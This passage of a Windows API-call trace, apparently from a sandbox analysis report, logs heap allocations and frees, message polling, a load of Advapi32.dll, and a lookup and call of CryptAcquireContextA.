hHeap=0x1780000) returned 1 [0116.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0116.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0116.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0116.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0116.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0116.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0116.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0116.222] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0116.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0116.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0116.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0116.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0116.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0116.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0116.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0116.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0116.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0116.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0116.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0116.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0116.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0116.222] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0116.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0116.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0116.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0116.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0116.223] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0116.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0116.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0116.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0116.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0116.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0116.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0116.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0116.223] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0116.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0116.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0116.223] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0116.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0116.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0116.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0116.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2750 [0116.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0116.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0116.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0116.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0116.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0116.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0116.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0116.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0116.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0116.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0116.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0116.224] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0116.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0116.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0116.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0116.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0116.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0116.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0116.224] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0116.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0116.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0116.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0116.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0116.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0116.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0116.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0116.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0116.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0116.225] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0116.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0116.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0116.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0116.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0116.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0116.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0116.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0116.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0116.225] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0116.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0116.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0116.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0116.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0116.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0116.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0116.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0116.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0116.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0116.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0116.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0116.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918c0 [0116.226] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918c0 | out: hHeap=0x1780000) returned 1 [0116.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0116.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac88 [0116.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0116.226] PeekMessageW (in: lpMsg=0x144e32c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e32c) returned 0 [0116.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0116.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0116.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0116.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0116.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0116.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0116.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0116.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0116.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0116.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0116.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0116.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0116.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0116.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0116.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0116.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0116.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0116.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0116.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0116.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0116.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0116.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0116.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0116.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0116.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0116.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0116.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0116.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0116.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0116.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0116.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0116.228] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0116.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0116.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0116.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0116.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0116.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0116.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0116.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0116.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0116.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0116.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0116.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0116.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0116.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0116.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0116.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0116.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0116.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0116.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0116.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0116.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0116.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0116.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0116.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0116.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0116.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0116.229] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0116.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0116.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0116.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797048, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0116.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0116.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0116.230] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0116.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0116.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0116.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0116.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0116.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0116.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0116.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0116.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0116.230] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a4d00) returned 1 [0116.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0116.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0116.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0116.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0116.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0116.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0116.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0116.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0116.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0116.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0116.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0116.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0116.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0116.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0116.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0116.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0116.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0116.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0116.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: 